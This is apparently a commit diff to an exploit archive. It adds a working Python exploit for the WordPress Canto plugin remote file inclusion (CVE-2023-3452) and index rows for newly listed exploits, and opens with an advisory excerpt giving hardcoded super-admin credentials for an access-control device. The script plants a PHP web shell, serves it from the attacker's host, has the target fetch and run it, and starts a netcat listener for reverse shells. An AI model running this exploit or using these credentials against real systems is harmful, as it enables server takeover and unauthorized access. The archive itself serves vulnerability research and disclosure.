 # CVE : CVE-2023-37608
 An issue in Automatic Systems SOC FL9600 FastLine version:V06 a remote attacker to obtain sensitive information via the admin login credentials.
 The device contains hardcoded login and password for super admin. The administrator cannot change the password for this account.
 Login: automaticsystems
 Password: astech
--- a/exploits/php/webapps/51826.py
+++ b/exploits/php/webapps/51826.py
@ -0,0 +1,106 @@
 # Exploit Title: Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE)
 # Date: 04/11/2023
 # Exploit Author: Leopoldo Angulo (leoanggal1)
 # Vendor Homepage: https://wordpress.org/plugins/canto/
 # Software Link: https://downloads.wordpress.org/plugin/canto.3.0.4.zip
 # Version: All versions of Canto Plugin prior to 3.0.5
 # Tested on: Ubuntu 22.04, Wordpress 6.3.2, Canto Plugin 3.0.4
 # CVE : CVE-2023-3452
 #PoC Notes:
 #The Canto plugin for WordPress is vulnerable to Remote File Inclusion in versions up to, and including, 3.0.4 via the 'wp_abspath' parameter. This allows unauthenticated attackers to include and execute arbitrary remote code on the server, provided that allow_url_include is enabled. (Reference: https://nvd.nist.gov/vuln/detail/CVE-2023-3452)
 #This code exploits the improper handling of the wp_abspath variable in the following line of the "download.php" code:
 #... require_once($_REQUEST['wp_abspath'] . '/wp-admin/admin.php'); ...
 #This is just an example but there is this same misconfiguration in other lines of the vulnerable plugin files.
 # More information in Leoanggal1's Github
 #!/usr/bin/python3
 import argparse
 import http.server
 import socketserver
 import threading
 import requests
 import os
 import subprocess
 # Define the default web shell
 default_web_shell = "<?php system($_GET['cmd']); ?>"
 def create_admin_file(local_dir, local_shell=None):
    if not os.path.exists(local_dir):
        os.makedirs(local_dir)
    # If a local shell is provided, use it; otherwise, use the default web shell
    if local_shell:
        with open(f"{local_dir}/admin.php", "wb") as admin_file:
            with open(local_shell, "rb") as original_file:
                admin_file.write(original_file.read())
    else:
        with open(f"{local_dir}/admin.php", "w") as admin_file:
            admin_file.write(default_web_shell)
 def start_local_server(local_port):
    Handler = http.server.SimpleHTTPRequestHandler
    httpd = socketserver.TCPServer(("0.0.0.0", local_port), Handler)
    print(f"Local web server on port {local_port}...")
    httpd.serve_forever()
    return httpd
 def exploit_rfi(url, local_shell, local_host, local_port, command, nc_port):
    local_dir = "wp-admin"
    create_admin_file(local_dir, local_shell)
    target_url = f"{url}/wp-content/plugins/canto/includes/lib/download.php"
    local_server = f"http://{local_host}:{local_port}"
    command = f"cmd={command}"
    if local_shell:
        # If a local shell is provided, start netcat on the specified port
        subprocess.Popen(["nc", "-lvp", str(nc_port)])
    server_thread = threading.Thread(target=start_local_server, args=(local_port,))
    server_thread.daemon = True
    server_thread.start()
    exploit_url = f"{target_url}?wp_abspath={local_server}&{command}"
    print(f"Exploitation URL: {exploit_url}")
    response = requests.get(exploit_url)
    print("Server response:")
    print(response.text)
    # Shutdown the local web server
    print("Shutting down local web server...")
    server_thread.join()
 if __name__ == "__main__":
    examples = '''
    Examples:
    - Check the vulnerability
    python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33
    - Execute a command
    python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -c 'id'
    - Upload and run a reverse shell file. You can download it from https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php or generate it with msfvenom.
    python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -s php-reverse-shell.php
    '''
    parser = argparse.ArgumentParser(description="Script to exploit the Remote File Inclusion vulnerability in the Canto plugin for WordPress - CVE-2023-3452", epilog=examples, formatter_class=argparse.RawDescriptionHelpFormatter)
    parser.add_argument("-u", "--url", required=True, default=None,  help="Vulnerable URL")
    parser.add_argument("-s", "--shell", help="Local file for web shell")
    parser.add_argument("-LHOST", "--local_host", required=True, help="Local web server IP")
    parser.add_argument("-LPORT", "--local_port", help="Local web server port")
    parser.add_argument("-c", "--command", default="whoami", help="Command to execute on the target")
    parser.add_argument("-NC_PORT", "--nc_port", type=int, help="Listener port for netcat")
    try:
        args = parser.parse_args()
        if args.local_port is None:
            args.local_port = 8080  # Valor predeterminado si LPORT no se proporciona
        exploit_rfi(args.url, args.shell, args.local_host, int(args.local_port), args.command, args.nc_port)
    except SystemExit:
        parser.print_help()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -3939,6 +3939,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 6750,exploits/hardware/remote/6750.txt,"Telecom Italia Alice Pirelli routers - Backdoor from internal LAN/WAN",2008-10-14,"saxdax & drpepperONE",remote,hardware,,2008-10-13,,1,OSVDB-49193,,,,,
 50948,exploits/hardware/remote/50948.py,"Telesquare SDT-CW3B1 1.1.0 - OS Command Injection",2022-06-03,"Bryan Leong",remote,hardware,,2022-06-03,2022-06-03,0,CVE-2021-46422,,,,,
 21513,exploits/hardware/remote/21513.c,"Telindus 1100 Series Router - Administration Password Leak",2002-06-05,rubik,remote,hardware,,2002-06-05,2012-09-24,1,CVE-2002-0949;OSVDB-4766,,,,,https://www.securityfocus.com/bid/4946/info
 51827,exploits/hardware/remote/51827.txt,"TEM Opera Plus FM Family Transmitter 35.45 - Remote Code Execution",2024-02-27,LiquidWorm,remote,hardware,,2024-02-27,2024-02-27,0,,,,,,
 51828,exploits/hardware/remote/51828.txt,"TEM Opera Plus FM Family Transmitter 35.45 - XSRF",2024-02-27,LiquidWorm,remote,hardware,,2024-02-27,2024-02-27,0,,,,,,
 44253,exploits/hardware/remote/44253.py,"Tenda AC15 Router - Remote Code Execution",2018-02-14,"Tim Carrington",remote,hardware,,2018-03-06,2018-03-06,0,CVE-2018-5767,,,http://www.exploit-db.com/screenshots/idlt44500/rootshell.png,,https://www.fidusinfosec.com/remote-code-execution-cve-2018-5767/
 49782,exploits/hardware/remote/49782.py,"Tenda D151 & D301 - Configuration Download (Unauthenticated)",2021-04-21,BenChaliah,remote,hardware,,2021-04-21,2021-04-21,0,,,,,,
 50916,exploits/hardware/remote/50916.txt,"Tenda HG6 v3.3.0 - Remote Command Injection",2022-05-11,LiquidWorm,remote,hardware,,2022-05-11,2022-05-11,0,,,,,,
@ -10810,6 +10812,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 20869,exploits/multiple/remote/20869.html,"eSafe Gateway 2.1 - Script-filtering Bypass",2001-05-20,"eDvice Security Services",remote,multiple,,2001-05-20,2012-08-28,1,CVE-2001-0520;OSVDB-7640,,,,,https://www.securityfocus.com/bid/2750/info
 39115,exploits/multiple/remote/39115.py,"ET - Chat Password Reset Security Bypass",2014-03-09,IRH,remote,multiple,,2014-03-09,2015-12-28,1,,,,,,https://www.securityfocus.com/bid/66149/info
 3555,exploits/multiple/remote/3555.pl,"Ethernet Device Drivers Frame Padding - 'Etherleak' Infomation Leakage",2007-03-23,"Jon Hart",remote,multiple,,2007-03-22,2017-04-13,1,CVE-2003-0001,,Etherleak,,,
 51825,exploits/multiple/remote/51825.txt,"Executables Created with perl2exe < V30.10C - Arbitrary Code Execution",2024-02-27,decrazyo,remote,multiple,,2024-02-27,2024-02-27,0,,,,,,
 20234,exploits/multiple/remote/20234.txt,"extent technologies rbs isp 2.5 - Directory Traversal",2000-09-21,anon,remote,multiple,8002,2000-09-21,2012-08-04,1,CVE-2000-1036;OSVDB-420,,,,,https://www.securityfocus.com/bid/1704/info
 48169,exploits/multiple/remote/48169.rb,"EyesOfNetwork - AutoDiscovery Target Command Execution (Metasploit)",2020-03-05,Metasploit,remote,multiple,,2020-03-05,2020-03-05,1,CVE-2020-8657;CVE-2020-8656;CVE-2020-8655;CVE-2020-8654,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb
 50932,exploits/multiple/remote/50932.py,"F5 BIG-IP 16.0.x - Remote Code Execution (RCE)",2022-05-12,"Yesith Alvarez",remote,multiple,,2022-05-12,2022-05-12,0,CVE-2022-1388,,,,,
@ -11658,6 +11661,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 24915,exploits/multiple/webapps/24915.txt,"Aspen 0.8 - Directory Traversal",2013-04-02,"Daniel Ricardo dos Santos",webapps,multiple,,2013-04-02,2013-04-02,1,CVE-2013-2619;OSVDB-91895,,,http://www.exploit-db.com/screenshots/idlt25000/screen-shot-2013-04-02-at-93955-am.png,http://www.exploit-db.comaspen-0.8.tgz,
 12133,exploits/multiple/webapps/12133.txt,"Asset Manager 1.0 - Arbitrary File Upload",2010-04-09,"Shichemt Alen & NeT_Own3r",webapps,multiple,,2010-04-08,,0,,,,,,
 37791,exploits/multiple/webapps/37791.txt,"Atlassian Confluence 3.4.x - Error Page Cross-Site Scripting",2012-09-12,"D. Niedermaier",webapps,multiple,,2012-09-12,2015-08-16,1,OSVDB-126486,,,,,https://www.securityfocus.com/bid/55509/info
 51829,exploits/multiple/webapps/51829.rb,"Atlassian Confluence Data Center and Server - Authentication Bypass (Metasploit)",2024-02-27,"Emir Polat",webapps,multiple,,2024-02-27,2024-02-27,0,,,,,,
 49465,exploits/multiple/webapps/49465.py,"Atlassian Confluence Widget Connector Macro - SSTI",2021-01-22,46o60,webapps,multiple,,2021-01-22,2021-01-22,0,CVE-2019-3396,,,,,
 49633,exploits/multiple/webapps/49633.py,"Atlassian JIRA 8.11.1 - User Enumeration",2021-03-10,"Dolev Farhi",webapps,multiple,,2021-03-10,2021-03-10,0,CVE-2020-14181,,,,,
 49924,exploits/multiple/webapps/49924.py,"Atlassian Jira 8.15.0 - Information Disclosure (Username Enumeration)",2021-06-01,"Mohammed Aloraimi",webapps,multiple,,2021-06-01,2021-06-01,0,,,,,,
@ -14377,6 +14381,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 35645,exploits/php/webapps/35645.txt,"Automagick Tube Script 1.4.4 - 'module' Cross-Site Scripting",2011-04-20,Kurd-Team,webapps,php,,2011-04-20,2014-12-29,1,,,,,,https://www.securityfocus.com/bid/47519/info
 41302,exploits/php/webapps/41302.txt,"Automated Job Portal Script - SQL Injection",2017-02-10,"Ihsan Sencan",webapps,php,,2017-02-10,2017-02-10,0,,,,,,
 8904,exploits/php/webapps/8904.txt,"Automated link exchange portal 1.3 - Multiple Vulnerabilities",2009-06-08,TiGeR-Dz,webapps,php,,2009-06-07,,1,,,,,,
 51823,exploits/php/webapps/51823.txt,"Automatic-Systems SOC FL9600 FastLine - Directory Transversal",2024-02-27,"Marcin Kozlowski",webapps,php,,2024-02-27,2024-02-27,0,,,,,,
 51824,exploits/php/webapps/51824.txt,"Automatic-Systems SOC FL9600 FastLine - The device contains hardcoded login and password for super admin",2024-02-27,"Marcin Kozlowski",webapps,php,,2024-02-27,2024-02-27,0,,,,,,
 10421,exploits/php/webapps/10421.txt,"Automne.ws CMS 4.0.0rc2 - Multiple Remote File Inclusions",2009-12-14,"1nd0n3s14n l4m3r",webapps,php,,2009-12-13,,0,,,,,http://www.exploit-db.comautomne4-v4_0_0rc3-install.tar.gz,
 1654,exploits/php/webapps/1654.txt,"autonomous lan party 0.98.1.0 - Remote File Inclusion",2006-04-09,Codexploder,webapps,php,,2006-04-08,2016-07-07,1,,,,,http://www.exploit-db.comalp_0-98-1-0_29jan2006.zip,
 9460,exploits/php/webapps/9460.txt,"autonomous lan party 0.98.3 - Remote File Inclusion",2009-08-18,cr4wl3r,webapps,php,,2009-08-17,,1,OSVDB-57180,,,,,
@ -16715,6 +16721,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 30303,exploits/php/webapps/30303.txt,"Dating Gold 3.0.5 - 'secure.admin.php?int_path' Remote File Inclusion",2007-07-13,mostafa_ragab,webapps,php,,2007-07-13,2013-12-15,1,CVE-2007-3792;OSVDB-36264,,,,,https://www.securityfocus.com/bid/24910/info
 39586,exploits/php/webapps/39586.txt,"Dating Pro Genie 2015.7 - Cross-Site Request Forgery",2016-03-21,"High-Tech Bridge SA",webapps,php,80,2016-03-21,2016-03-21,0,,,,,,https://www.htbridge.com/advisory/HTB23294
 41027,exploits/php/webapps/41027.txt,"Dating Script 3.25 - SQL Injection",2017-01-11,"Dawid Morawski",webapps,php,,2017-01-11,2017-01-11,0,,,,,,
 51818,exploits/php/webapps/51818.txt,"dawa-pharma 1.0-2022 - Multiple-SQLi",2024-02-27,nu11secur1ty,webapps,php,,2024-02-27,2024-02-27,0,,,,,,
 3478,exploits/php/webapps/3478.html,"Dayfox Blog 4 - 'postpost.php' Remote Code Execution",2007-03-14,Dj7xpl,webapps,php,,2007-03-13,,1,OSVDB-34073;CVE-2007-1525,,,,,
 6203,exploits/php/webapps/6203.txt,"Dayfox Blog 4 - Multiple Local File Inclusions",2008-08-04,"Virangar Security",webapps,php,,2008-08-03,,1,OSVDB-47438;CVE-2008-3564,,,,,
 5347,exploits/php/webapps/5347.txt,"DaZPHP 0.1 - 'prefixdir' Local File Inclusion",2008-04-02,w0cker,webapps,php,,2008-04-01,2016-11-17,1,OSVDB-43998;CVE-2008-1696,,,,,
@ -23656,6 +23663,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49814,exploits/php/webapps/49814.txt,"Moodle 3.6.1 - Persistent Cross-Site Scripting (XSS)",2021-04-30,"Fariskhi Vidyan",webapps,php,,2021-04-30,2021-04-30,0,CVE-2019-3810,,,,,
 49114,exploits/php/webapps/49114.txt,"Moodle 3.8 - Unrestricted File Upload",2020-11-27,"Sirwan Veisi",webapps,php,,2020-11-27,2020-11-27,0,,,,,,
 50180,exploits/php/webapps/50180.py,"Moodle 3.9 - Remote Code Execution (RCE) (Authenticated)",2021-08-05,lanz,webapps,php,,2021-08-05,2021-08-05,0,,,,,,
 51820,exploits/php/webapps/51820.txt,"Moodle 4.3 - Insecure Direct Object Reference",2024-02-27,tmrswrr,webapps,php,,2024-02-27,2024-02-27,0,,,,,,
 51821,exploits/php/webapps/51821.txt,"Moodle 4.3 - Reflected XSS",2024-02-27,tmrswrr,webapps,php,,2024-02-27,2024-02-27,0,,,,,,
 8297,exploits/php/webapps/8297.txt,"Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 - File Disclosure",2009-03-27,"Christian J. Eibl",webapps,php,,2009-03-26,,1,OSVDB-52998;CVE-2009-1171,,,,,
 28770,exploits/php/webapps/28770.txt,"Moodle Blog 1.18.2.2/1.6.2 Module - SQL Injection",2006-10-08,disfigure,webapps,php,,2006-10-08,2013-10-07,1,CVE-2006-5219;OSVDB-29573,,,,,https://www.securityfocus.com/bid/20395/info
 47177,exploits/php/webapps/47177.txt,"Moodle Filepicker 3.5.2 - Server Side Request Forgery",2019-07-26,"Fabian Mosch_ Nick Theisinger",webapps,php,80,2019-07-26,2019-07-26,0,CVE-2018-1042,"Server-Side Request Forgery (SSRF)",,,http://www.exploit-db.commoodle-3.5.2.tar.gz,
@ -30382,6 +30391,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 8869,exploits/php/webapps/8869.txt,"Supernews 2.6 - 'index.php?noticia' SQL Injection",2009-06-03,DD3str0y3r,webapps,php,,2009-06-02,,1,,,,,,
 18961,exploits/php/webapps/18961.txt,"Supernews 2.6.1 - 'noticias.php?cat' SQL Injection",2012-05-31,"Yakir Wizman",webapps,php,,2012-05-31,2012-05-31,1,OSVDB-82416,,,,http://www.exploit-db.comSuperNews-2.6.1.zip,
 18913,exploits/php/webapps/18913.php,"Supernews 2.6.1 - SQL Injection",2012-05-21,WhiteCollarGroup,webapps,php,,2012-05-21,2012-05-22,1,OSVDB-82310;OSVDB-82309;OSVDB-82308,,,http://www.exploit-db.com/screenshots/idlt19000/screen-shot-2012-05-22-at-75838-am.png,http://www.exploit-db.comSuperNews-2.6.1.zip,
 51822,exploits/php/webapps/51822.txt,"SuperStoreFinder - Multiple Vulnerabilities",2024-02-27,bRpsd,webapps,php,,2024-02-27,2024-02-27,0,,,,,,
 49239,exploits/php/webapps/49239.txt,"Supply Chain Management System - Auth Bypass SQL Injection",2020-12-11,"Piyush Malviya",webapps,php,,2020-12-11,2020-12-11,0,,,,,,
 50294,exploits/php/webapps/50294.txt,"Support Board 3.3.3 - 'Multiple' SQL Injection (Unauthenticated)",2021-09-15,"John Jefferson Li",webapps,php,,2021-09-15,2021-09-15,0,,,,,,
 50419,exploits/php/webapps/50419.txt,"Support Board 3.3.4 - 'Message' Stored Cross-Site Scripting (XSS)",2021-10-18,"John Jefferson Li",webapps,php,,2021-10-18,2021-10-18,0,,,,,,
@ -32857,6 +32867,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 36230,exploits/php/webapps/36230.txt,"WordPress Plugin Calculated Fields Form 1.0.10 - SQL Injection",2015-03-02,"Ibrahim Raafat",webapps,php,,2015-03-05,2015-03-05,0,OSVDB-119606,"WordPress Plugin",,,,
 44489,exploits/php/webapps/44489.txt,"WordPress Plugin Caldera Forms 1.5.9.1 - Cross-Site Scripting",2018-04-18,"Federico Scalco",webapps,php,80,2018-04-18,2018-04-18,0,CVE-2018-7747,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comCaldera-Forms-1.5.9.1.zip,
 37754,exploits/php/webapps/37754.txt,"WordPress Plugin Candidate Application Form 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",webapps,php,80,2015-08-10,2015-08-10,0,OSVDB-124797,"WordPress Plugin",,,,
 51826,exploits/php/webapps/51826.py,"Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE)",2024-02-27,"Leopoldo Angulo (leoanggal1)",webapps,php,,2024-02-27,2024-02-27,0,,,,,,
 43012,exploits/php/webapps/43012.txt,"WordPress Plugin Car Park Booking - SQL Injection",2017-10-17,8bitsec,webapps,php,,2017-10-18,2017-10-28,0,,,,,,
 41920,exploits/php/webapps/41920.txt,"WordPress Plugin Car Rental System 2.5 - SQL Injection",2017-04-25,"TAD GROUP",webapps,php,80,2017-04-25,2018-10-12,0,,"SQL Injection (SQLi)",,,,
 28959,exploits/php/webapps/28959.txt,"WordPress Plugin Cart66 1.5.1.14 - Multiple Vulnerabilities",2013-10-14,absane,webapps,php,80,2013-10-14,2013-10-14,1,CVE-2013-5978;OSVDB-98353;CVE-2013-5977;OSVDB-98352,"WordPress Plugin",,,http://www.exploit-db.comcart66-lite.1.5.1.14.zip,
@ -34696,6 +34707,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49501,exploits/php/webapps/49501.txt,"Zoo Management System 1.0 - 'anid' SQL Injection",2021-02-01,"Zeyad Azima",webapps,php,,2021-02-01,2021-02-01,0,,,,,,
 50117,exploits/php/webapps/50117.txt,"Zoo Management System 1.0 - 'Multiple' Persistent Cross-Site-Scripting (XSS)",2021-07-09,"Subhadip Nag",webapps,php,,2021-07-09,2021-10-29,0,,,,,,
 48880,exploits/php/webapps/48880.txt,"Zoo Management System 1.0 - Authentication Bypass",2020-10-15,"Jyotsna Adhana",webapps,php,,2020-10-15,2020-10-15,0,,,,,,
 51819,exploits/php/webapps/51819.txt,"Zoo Management System 1.0 - Unauthenticated RCE",2024-02-27,"Çağatay Ceyhan",webapps,php,,2024-02-27,2024-02-27,0,,,,,,
 25379,exploits/php/webapps/25379.txt,"Zoom Media Gallery 2.1.2 - 'index.php' SQL Injection",2005-04-11,"Andreas Constantinides",webapps,php,,2005-04-11,2013-05-12,1,CVE-2005-1079;OSVDB-15475,,,,,https://www.securityfocus.com/bid/13094/info
 2420,exploits/php/webapps/2420.txt,"ZoomStats 1.0.2 - 'mysql.php' Remote File Inclusion",2006-09-24,Drago84,webapps,php,,2006-09-23,2016-09-09,1,OSVDB-31431;CVE-2006-5065,,,,http://www.exploit-db.comZoomStats-v1.0.2.zip,
 15354,exploits/php/webapps/15354.txt,"Zoopeer 0.1/0.2 - 'FCKeditor' Arbitrary File Upload",2010-10-30,Net.Edit0r,webapps,php,,2010-10-30,2010-10-30,0,,,,,,